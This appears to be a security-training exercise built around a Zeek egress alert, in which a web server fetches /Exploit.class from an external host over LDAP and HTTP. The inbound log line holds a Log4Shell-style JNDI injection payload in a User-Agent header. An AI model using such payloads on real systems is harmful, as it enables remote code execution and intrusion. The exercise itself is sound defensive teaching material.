criticalZeek, egress monitoring · 15 minutes

A web server asked a stranger for a class file

The alert, as it arrived

Zeek, egress monitoring
[21:08:14] EGRESS ANOMALY · app-tier · Severity: Critical
Outbound LDAP from an application server that has never spoken LDAP outbound

  21:08:12  10.40.2.18:51204 -> 45.***.***.77:1389   ldap   2 pkts
  21:08:13  10.40.2.18:51208 -> 45.***.***.77:8080   http   GET /Exploit.class
  21:08:14  10.40.2.18:51211 -> 45.***.***.77:1389   ldap   2 pkts

  Preceding inbound, same second, load balancer log:
    GET /api/status
    User-Agent: ${jndi:ldap://45.***.***.77:1389/a}

Your turn

Establish whether this succeeded, and decide what you tell the business in the next thirty minutes.

Write it down before you scroll. The value of this is in committing to an answer you can be wrong about, and reading the breakdown first removes it entirely.

Analyst breakdown

Pro

Unlock the expert breakdown and hunting queries with a Pro membership.

5 steps in order, each with the reasoning and a runnable query, plus the trap most responders fall into on this one and what the incident actually turns out to be. The scenario above stays free and complete: work it first, and the breakdown is worth more.